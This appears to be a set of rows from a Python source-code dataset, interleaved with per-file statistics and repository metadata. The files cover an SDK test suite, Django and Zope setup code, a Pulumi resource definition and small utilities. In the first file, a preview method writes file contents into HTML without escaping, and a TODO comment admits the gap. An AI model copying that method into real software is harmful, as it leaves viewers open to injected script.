PreviewObject = namedtuple('PreviewObject', ['fp', 'resource_id'])
def _force_decode(byte_array):
try:
return byte_array.decode("utf-8")
except UnicodeDecodeError:
return f"# not a UTF-8 sequence:\n{byte_array}"
return "Failed to decode the sequence"
class BaseResource:
"""Base Resource class"""
DISPLAY_RAW: bool = False
def __init__(self):
pass
@staticmethod
def prepare_input(filename: str, preview: bool = False) -> Dict[str, str]: # pylint: disable=unused-argument
"""Resource preprocessor"""
return {NodeResources.INPUT: filename}
@staticmethod
def prepare_output(filename: str, preview: bool = False) -> Dict[str, str]:
"""Prepare output"""
if not preview:
# Create file
with open(filename, 'a'):
pass
return {NodeResources.OUTPUT: filename}
@staticmethod
def postprocess_output(filename: str) -> str:
"""Resource postprocessor"""
return filename
@classmethod
def preview(cls, preview_object: PreviewObject) -> str:
"""Preview Resource"""
# TODO escape html code for security reasons
data = _force_decode(preview_object.fp.read())
return f"<pre>{data}</pre>"
| 28.76 | 116 | 0.645341 | 158 | 1,438 | 5.759494 | 0.493671 | 0.02967 | 0.048352 | 0.048352 | 0.081319 | 0.081319 | 0.081319 | 0.081319 | 0 | 0 | 0 | 0.001845 | 0.246175 | 1,438 | 49 | 117 | 29.346939 | 0.837638 | 0.156467 | 0 | 0.166667 | 0 | 0 | 0.097458 | 0.019492 | 0 | 0 | 0 | 0.020408 | 0 | 1 | 0.2 | false | 0.066667 | 0.1 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
76f625a9aea0ade09d8888d306db58ebdb52aa50 | 4,866 | py | Python | tests/rubrik_polaris/sonar_scan_test.py | crestdatasystems/rubrik-polaris-sdk-for-python | ff0086ab7432db621a8ec89e1b5cba8d0caca7e2 | [
"MIT"
] | null | null | null | tests/rubrik_polaris/sonar_scan_test.py | crestdatasystems/rubrik-polaris-sdk-for-python | ff0086ab7432db621a8ec89e1b5cba8d0caca7e2 | [
"MIT"
] | null | null | null | tests/rubrik_polaris/sonar_scan_test.py | crestdatasystems/rubrik-polaris-sdk-for-python | ff0086ab7432db621a8ec89e1b5cba8d0caca7e2 | [
"MIT"
] | null | null | null | import os
import pytest
from conftest import util_load_json, BASE_URL
from rubrik_polaris.sonar.scan import ERROR_MESSAGES
FILE_TYPES = ['ANY', 'HITS', 'STALE', 'OPEN_ACCESS', 'STALE_HITS', 'OPEN_ACCESS_HITS']
@pytest.mark.parametrize("scan_name, resources, analyzer_groups", [
("", [{"snappableFid": "dummy_id"}], [{"id": "dummy_id"}]),
("scan_name", [], [{"id": "dummy_id"}]),
("scan_name", [{"snappableFid": "dummy_id"}], [])
])
def test_trigger_on_demand_scan_when_invalid_values_are_provided(client, scan_name, resources, analyzer_groups):
"""
Tests trigger_on_demand_scan method of PolarisClient when invalid values are provided
"""
from rubrik_polaris.sonar.scan import trigger_on_demand_scan
with pytest.raises(ValueError) as e:
trigger_on_demand_scan(client, scan_name=scan_name, resources=resources, analyzer_groups=analyzer_groups)
assert str(e.value) == ERROR_MESSAGES['MISSING_PARAMETERS_IN_SCAN']
def test_trigger_on_demand_scan_when_valid_values_are_provided(requests_mock, client):
"""
Tests trigger_on_demand_scan method of PolarisClient when valid values are provided
"""
from rubrik_polaris.sonar.scan import trigger_on_demand_scan
expected_response = util_load_json(os.path.join(os.path.dirname(os.path.realpath(__file__)),
"test_data/on_demand_scan.json"))
requests_mock.post(BASE_URL + "/graphql", json=expected_response)
scan_name = "Scan from SDK"
resources = [{"snappableFid": "dummy_id"}]
analyzer_groups = [{"id": "dummy_id", "name": "name", "groupType": "group_type", "analyzers": [{}]}]
response = trigger_on_demand_scan(
client, scan_name=scan_name, resources=resources, analyzer_groups=analyzer_groups)
assert response == expected_response
def test_get_on_demand_scan_status_when_valid_values_are_provided(requests_mock, client):
"""
Tests get_on_demand_scan_status method of PolarisClient when valid values are provided
"""
from rubrik_polaris.sonar.scan import get_on_demand_scan_status
expected_response = util_load_json(os.path.join(os.path.dirname(os.path.realpath(__file__)),
"test_data/on_demand_scan_status.json"))
requests_mock.post(BASE_URL + "/graphql", json=expected_response)
response = get_on_demand_scan_status(client, crawl_id="587d147a-add9-4152-b7a0-5a667d99f395")
assert response == expected_response
@pytest.mark.parametrize("crawl_id", [""])
def test_get_on_demand_scan_status_when_invalid_values_are_provided(client, crawl_id):
"""
Tests get_on_demand_scan_status method of PolarisClient when invalid values are provided
"""
from rubrik_polaris.sonar.scan import get_on_demand_scan_status
with pytest.raises(ValueError) as e:
get_on_demand_scan_status(client, crawl_id=crawl_id)
assert str(e.value) == ERROR_MESSAGES['MISSING_PARAMETERS_IN_SCAN_STATUS']
@pytest.mark.parametrize("crawl_id, filters, err_msg", [
("", {"fileType": "HITS"}, ERROR_MESSAGES['MISSING_PARAMETERS_IN_SCAN_RESULT']),
("scan_name", {}, ERROR_MESSAGES['MISSING_PARAMETERS_IN_SCAN_RESULT']),
("scan_name", {"fileType": "HIT"}, ERROR_MESSAGES['INVALID_FILE_TYPE'].format('HIT', FILE_TYPES))
])
def test_get_on_demand_scan_result_when_invalid_values_are_provided(client, crawl_id, filters, err_msg, requests_mock):
"""
Tests get_on_demand_scan_result method of PolarisClient when invalid values are provided
"""
from rubrik_polaris.sonar.scan import get_on_demand_scan_result
expected_response = util_load_json(
os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_data/file_type_values.json")
)
requests_mock.post(BASE_URL + "/graphql", json=expected_response)
with pytest.raises(ValueError) as e:
get_on_demand_scan_result(client, crawl_id=crawl_id, filters=filters)
assert str(e.value) == err_msg
def test_get_on_demand_scan_result_when_valid_values_are_provided(requests_mock, client):
"""
Tests get_on_demand_scan_result method of PolarisClient when valid values are provided
"""
from rubrik_polaris.sonar.scan import get_on_demand_scan_result
query_response = util_load_json(os.path.join(os.path.dirname(os.path.realpath(__file__)),
"test_data/on_demand_scan_result.json"))
enum_response = util_load_json(
os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_data/file_type_values.json")
)
responses = [
{'json': enum_response},
{'json': query_response}
]
requests_mock.post(BASE_URL + "/graphql", responses)
response = get_on_demand_scan_result(client, crawl_id="dummy_id", filters={"fileType": "HITS"})
assert response == query_response
| 43.061947 | 119 | 0.728935 | 648 | 4,866 | 5.050926 | 0.143519 | 0.065995 | 0.098992 | 0.073327 | 0.806599 | 0.743049 | 0.70608 | 0.68897 | 0.597311 | 0.53865 | 0 | 0.005387 | 0.160707 | 4,866 | 112 | 120 | 43.446429 | 0.796033 | 0.107069 | 0 | 0.298507 | 0 | 0 | 0.169723 | 0.076164 | 0 | 0 | 0 | 0 | 0.089552 | 1 | 0.089552 | false | 0 | 0.149254 | 0 | 0.238806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76f926951e7b3191305fab755280da429f174f8f | 1,403 | py | Python | user/migrations/0004_auto_20190705_1454.py | BreakUnrealGod/TanTan | 043454a76ee27d61e7d9aede7818f9127e34aaf2 | [
"MIT"
] | null | null | null | user/migrations/0004_auto_20190705_1454.py | BreakUnrealGod/TanTan | 043454a76ee27d61e7d9aede7818f9127e34aaf2 | [
"MIT"
] | 10 | 2019-12-04T23:38:04.000Z | 2022-02-10T09:53:59.000Z | swiper/user/migrations/0004_auto_20190705_1454.py | lijiaqipy/test1 | ab628a794ab67e153b929c819c876c5a676ab068 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.3 on 2019-07-05 14:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0003_auto_20190704_1547'),
]
operations = [
migrations.RenameField(
model_name='user',
old_name='birth_mohth',
new_name='birth_month',
),
migrations.RenameField(
model_name='user',
old_name='birth_yaer',
new_name='birth_year',
),
migrations.AlterField(
model_name='profile',
name='dating_sex',
field=models.IntegerField(choices=[(0, '全部'), (1, '男'), (2, '女')], default=0),
),
migrations.AlterField(
model_name='profile',
name='location',
field=models.CharField(choices=[('bj', '北京'), ('sz', '深圳'), ('sh', '上海'), ('gz', '广州'), ('cd', '成都'), ('dl', '大连')], max_length=64),
),
migrations.AlterField(
model_name='user',
name='location',
field=models.CharField(choices=[('bj', '北京'), ('sz', '深圳'), ('sh', '上海'), ('gz', '广州'), ('cd', '成都'), ('dl', '大连')], max_length=64),
),
migrations.AlterField(
model_name='user',
name='sex',
field=models.IntegerField(choices=[(0, '全部'), (1, '男'), (2, '女')], default=0),
),
]
| 31.886364 | 144 | 0.496793 | 146 | 1,403 | 4.636986 | 0.445205 | 0.079764 | 0.076809 | 0.171344 | 0.711965 | 0.711965 | 0.599705 | 0.599705 | 0.463811 | 0.463811 | 0 | 0.044284 | 0.307912 | 1,403 | 43 | 145 | 32.627907 | 0.652935 | 0.032074 | 0 | 0.648649 | 1 | 0 | 0.135693 | 0.016962 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a075be8805805fed40a5a0838052f57b229cf58 | 238 | py | Python | AtCoder/ABC029/C.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | 1 | 2018-11-25T04:15:45.000Z | 2018-11-25T04:15:45.000Z | AtCoder/ABC029/C.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | null | null | null | AtCoder/ABC029/C.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | 2 | 2018-08-08T13:01:14.000Z | 2018-11-25T12:38:36.000Z | N = int(input())
def brute_force(s, remain):
if remain == 0:
print(s)
else:
brute_force(s + "a", remain - 1)
brute_force(s + "b", remain - 1)
brute_force(s + "c", remain - 1)
brute_force("", N)
| 17 | 40 | 0.508403 | 35 | 238 | 3.314286 | 0.457143 | 0.431034 | 0.37931 | 0.439655 | 0.310345 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024691 | 0.319328 | 238 | 13 | 41 | 18.307692 | 0.691358 | 0 | 0 | 0 | 0 | 0 | 0.012605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.111111 | 0.111111 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a0766ccdfab40edb3131b5ef4903ea06f8f355a | 396 | py | Python | dazu/training_data/reader.py | Dazu-io/dazu | 064a7fd91961bdf372868e7b0a106102e9fc058b | [
"Apache-2.0"
] | 2 | 2020-03-14T18:17:08.000Z | 2020-07-10T01:05:52.000Z | dazu/training_data/reader.py | Dazu-io/dazu | 064a7fd91961bdf372868e7b0a106102e9fc058b | [
"Apache-2.0"
] | 41 | 2020-01-20T22:30:08.000Z | 2020-02-21T19:46:52.000Z | dazu/training_data/reader.py | Dazu-io/dazu | 064a7fd91961bdf372868e7b0a106102e9fc058b | [
"Apache-2.0"
] | 3 | 2019-03-15T17:56:04.000Z | 2020-01-17T20:29:37.000Z | from abc import abstractmethod
from typing import Dict
from dazu.config import DazuConfig
from dazu.registry import Module
from dazu.typing import TrainingData
class Reader(Module):
@classmethod
@abstractmethod
def load(cls, config: DazuConfig) -> TrainingData:
pass
@classmethod
def validate_data(cls, config: DazuConfig, data: Dict) -> bool:
return True
| 22 | 67 | 0.729798 | 47 | 396 | 6.12766 | 0.510638 | 0.083333 | 0.131944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.207071 | 396 | 17 | 68 | 23.294118 | 0.917197 | 0 | 0 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0.076923 | 0.384615 | 0.076923 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
0a14f4c1f0df038c2f10a10238e8e6670db20514 | 1,388 | py | Python | src/ZServer/Zope2/Startup/__init__.py | datakurre/ZServer | 9aa87900463229350f691f1c8877c6e8f13538c8 | [
"ZPL-2.1"
] | 1 | 2019-06-14T15:39:18.000Z | 2019-06-14T15:39:18.000Z | src/ZServer/Zope2/Startup/__init__.py | datakurre/ZServer | 9aa87900463229350f691f1c8877c6e8f13538c8 | [
"ZPL-2.1"
] | null | null | null | src/ZServer/Zope2/Startup/__init__.py | datakurre/ZServer | 9aa87900463229350f691f1c8877c6e8f13538c8 | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
from __future__ import absolute_import
import sys
# The default async io event loop and twisted reactor can only be
# set once. Therefore they must be set as early as possible.
try:
import uvloop
uvloop.install()
except ImportError:
pass
from twisted.internet.error import ReactorAlreadyInstalledError
try:
import twisted.internet.asyncioreactor
twisted.internet.asyncioreactor.install()
except (ImportError, ReactorAlreadyInstalledError):
pass
def get_starter():
if sys.platform[:3].lower() == "win":
from ZServer.Zope2.Startup.starter import WindowsZopeStarter
return WindowsZopeStarter()
else:
from ZServer.Zope2.Startup.starter import UnixZopeStarter
return UnixZopeStarter()
| 31.545455 | 78 | 0.669308 | 155 | 1,388 | 5.954839 | 0.625806 | 0.048754 | 0.030336 | 0.049837 | 0.078007 | 0.078007 | 0 | 0 | 0 | 0 | 0 | 0.007732 | 0.161383 | 1,388 | 43 | 79 | 32.27907 | 0.785223 | 0.416427 | 0 | 0.2 | 0 | 0 | 0.004688 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | true | 0.1 | 0.45 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 3 |
0a45e19210e3f8fd15ff3b6f8f8ce4c6ca714738 | 16 | py | Python | chabie/__init__.py | TatchNicolas/chabie | 6650da8d34341e181a3ae3d47e76c024bcc0a8dc | [
"MIT"
] | 2 | 2018-12-04T01:40:54.000Z | 2019-01-29T05:05:20.000Z | chabie/__init__.py | TatchNicolas/chabie | 6650da8d34341e181a3ae3d47e76c024bcc0a8dc | [
"MIT"
] | 3 | 2020-03-24T16:28:22.000Z | 2021-02-02T22:06:47.000Z | chabie/__init__.py | TatchNicolas/chabie | 6650da8d34341e181a3ae3d47e76c024bcc0a8dc | [
"MIT"
] | null | null | null | name = 'chabie'
| 8 | 15 | 0.625 | 2 | 16 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 16 | 1 | 16 | 16 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a49f25c6cb66c0881a569ced7bd0a0345534fa0 | 329 | py | Python | awx/main/routing.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 2 | 2018-11-12T18:52:24.000Z | 2020-05-22T18:41:21.000Z | awx/main/routing.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 4 | 2020-04-29T23:03:16.000Z | 2022-03-01T23:56:09.000Z | awx/main/routing.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 9 | 2019-05-11T00:03:30.000Z | 2021-07-07T16:09:17.000Z | from channels.routing import route
channel_routing = [
route("websocket.connect", "awx.main.consumers.ws_connect", path=r'^/websocket/$'),
route("websocket.disconnect", "awx.main.consumers.ws_disconnect", path=r'^/websocket/$'),
route("websocket.receive", "awx.main.consumers.ws_receive", path=r'^/websocket/$'),
]
| 36.555556 | 93 | 0.711246 | 40 | 329 | 5.75 | 0.4 | 0.182609 | 0.208696 | 0.234783 | 0.243478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094225 | 329 | 8 | 94 | 41.125 | 0.771812 | 0 | 0 | 0 | 0 | 0 | 0.556231 | 0.273556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a4a7c2e881ce42dc6e0b95e826eb31368ac6e12 | 2,232 | py | Python | py_client/aidm/aidm_track_closure_classes.py | sma-software/openviriato.algorithm-platform.py-client | 73d4cf89aa6f4d02ab15b5504d92107848742325 | [
"Apache-2.0"
] | 2 | 2021-06-21T06:50:29.000Z | 2021-06-30T15:58:02.000Z | py_client/aidm/aidm_track_closure_classes.py | sma-software/openviriato.algorithm-platform.py-client | 73d4cf89aa6f4d02ab15b5504d92107848742325 | [
"Apache-2.0"
] | null | null | null | py_client/aidm/aidm_track_closure_classes.py | sma-software/openviriato.algorithm-platform.py-client | 73d4cf89aa6f4d02ab15b5504d92107848742325 | [
"Apache-2.0"
] | null | null | null | from py_client.aidm.aidm_base_classes import _HasDebugString
from py_client.aidm.aidm_time_window_classes import TimeWindow
class AlgorithmNodeTrackClosure(_HasDebugString):
__node_id: int
__node_track_id: int
__closure_time_window: TimeWindow
def __init__(self, debug_string: str, node_id: int, node_track_id: int, closure_time_window: TimeWindow):
_HasDebugString.__init__(self, debug_string)
self.__closure_time_window = closure_time_window
self.__node_id = node_id
self.__node_track_id = node_track_id
@property
def node_id(self) -> int:
return self.__node_id
@property
def node_track_id(self) -> int:
return self.__node_track_id
@property
def closure_time_window(self) -> TimeWindow:
return self.__closure_time_window
class AlgorithmSectionTrackClosure(_HasDebugString):
__section_track_id: int
__from_node_id: int
__to_node_id: int
__closure_time_window_from_node: TimeWindow
__closure_time_window_to_node: TimeWindow
def __init__(
self,
debug_string: str,
section_track_id: int,
from_node_id: int,
to_node_id: int,
closure_time_window_from_node: TimeWindow,
closure_time_window_to_node: TimeWindow):
_HasDebugString.__init__(self, debug_string)
self.__section_track_id = section_track_id
self.__from_node_id = from_node_id
self.__to_node_id = to_node_id
self.__closure_time_window_from_node = closure_time_window_from_node
self.__closure_time_window_to_node = closure_time_window_to_node
@property
def section_track_id(self) -> int:
return self.__section_track_id
@property
def from_node_id(self) -> int:
return self.__from_node_id
@property
def to_node_id(self) -> int:
return self.__to_node_id
@property
def closure_time_window_from_node(self) -> TimeWindow:
return self.__closure_time_window_from_node
@property
def closure_time_window_to_node(self) -> TimeWindow:
return self.__closure_time_window_to_node
| 31.885714 | 110 | 0.697133 | 281 | 2,232 | 4.846975 | 0.103203 | 0.139501 | 0.22467 | 0.092511 | 0.717327 | 0.629222 | 0.420705 | 0.299559 | 0.23348 | 0.23348 | 0 | 0 | 0.247312 | 2,232 | 69 | 111 | 32.347826 | 0.810714 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.036364 | 0.145455 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
0a6077624e8a5eec68b3d6b8f51513c0ebaf50fb | 1,280 | py | Python | Android/parser/ui/images/encode_bitmaps.py | Bravest-Ptt/Useful-Shell | 75016ff44f218afce6b885af7b23fb801a7ef2d4 | [
"Apache-2.0"
] | 1 | 2020-05-31T08:46:45.000Z | 2020-05-31T08:46:45.000Z | Android/parser/ui/images/encode_bitmaps.py | Bravest-Ptt/Useful-Shell | 75016ff44f218afce6b885af7b23fb801a7ef2d4 | [
"Apache-2.0"
] | null | null | null | Android/parser/ui/images/encode_bitmaps.py | Bravest-Ptt/Useful-Shell | 75016ff44f218afce6b885af7b23fb801a7ef2d4 | [
"Apache-2.0"
] | null | null | null |
"""
This is a way to save the startup time when running img2py on lots of
files...
"""
import sys
from wx.tools import img2py
command_lines = [
" -F -n action_clean_history action_clean_history.png images.py",
"-a -F -n action_new action_new.png images.py",
"-a -F -n app_splash app_splash.png images.py",
"-a -F -n web_service_error web_service_error.png images.py",
"-a -F -n web_service_info web_service_info.png images.py",
"-a -F -n web_service_success web_service_success.png images.py",
"-a -F -n task_done task_done.png images.py",
"-a -F -n task_process task_process.png images.py",
"-a -F -n task_paused task_paused.png images.py",
"-a -F -n task_waiting task_waiting.png images.py",
"-a -F -n task_generating task_generating.png images.py"
]
if __name__ == "__main__":
for line in command_lines:
args = line.split()
img2py.main(args)
| 42.666667 | 92 | 0.489844 | 156 | 1,280 | 3.762821 | 0.339744 | 0.037479 | 0.206133 | 0.204429 | 0.32368 | 0.32368 | 0.27598 | 0.122658 | 0 | 0 | 0 | 0.00406 | 0.422656 | 1,280 | 29 | 93 | 44.137931 | 0.790257 | 0.060938 | 0 | 0 | 0 | 0 | 0.782718 | 0.057047 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a6611331aec5272182cb56364fda31f43b05983 | 11,288 | py | Python | sdk/python/pulumi_alicloud/apigateway/vpc_access.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/apigateway/vpc_access.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/apigateway/vpc_access.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['VpcAccessArgs', 'VpcAccess']
@pulumi.input_type
class VpcAccessArgs:
def __init__(__self__, *,
instance_id: pulumi.Input[str],
port: pulumi.Input[int],
vpc_id: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a VpcAccess resource.
:param pulumi.Input[str] instance_id: ID of the instance in VPC (ECS/Server Load Balance).
:param pulumi.Input[int] port: ID of the port corresponding to the instance.
:param pulumi.Input[str] vpc_id: The vpc id of the vpc authorization.
:param pulumi.Input[str] name: The name of the vpc authorization.
"""
pulumi.set(__self__, "instance_id", instance_id)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "vpc_id", vpc_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Input[str]:
"""
ID of the instance in VPC (ECS/Server Load Balance).
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
ID of the port corresponding to the instance.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Input[str]:
"""
The vpc id of the vpc authorization.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vpc_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the vpc authorization.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _VpcAccessState:
def __init__(__self__, *,
instance_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering VpcAccess resources.
:param pulumi.Input[str] instance_id: ID of the instance in VPC (ECS/Server Load Balance).
:param pulumi.Input[str] name: The name of the vpc authorization.
:param pulumi.Input[int] port: ID of the port corresponding to the instance.
:param pulumi.Input[str] vpc_id: The vpc id of the vpc authorization.
"""
if instance_id is not None:
pulumi.set(__self__, "instance_id", instance_id)
if name is not None:
pulumi.set(__self__, "name", name)
if port is not None:
pulumi.set(__self__, "port", port)
if vpc_id is not None:
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the instance in VPC (ECS/Server Load Balance).
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the vpc authorization.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
ID of the port corresponding to the instance.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> Optional[pulumi.Input[str]]:
"""
The vpc id of the vpc authorization.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_id", value)
class VpcAccess(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## Import
Api gateway app can be imported using the id, e.g.
```sh
$ pulumi import alicloud:apigateway/vpcAccess:VpcAccess example "APiGatewayVpc:vpc-aswcj19ajsz:i-ajdjfsdlf:8080"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] instance_id: ID of the instance in VPC (ECS/Server Load Balance).
:param pulumi.Input[str] name: The name of the vpc authorization.
:param pulumi.Input[int] port: ID of the port corresponding to the instance.
:param pulumi.Input[str] vpc_id: The vpc id of the vpc authorization.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VpcAccessArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
Api gateway app can be imported using the id, e.g.
```sh
$ pulumi import alicloud:apigateway/vpcAccess:VpcAccess example "APiGatewayVpc:vpc-aswcj19ajsz:i-ajdjfsdlf:8080"
```
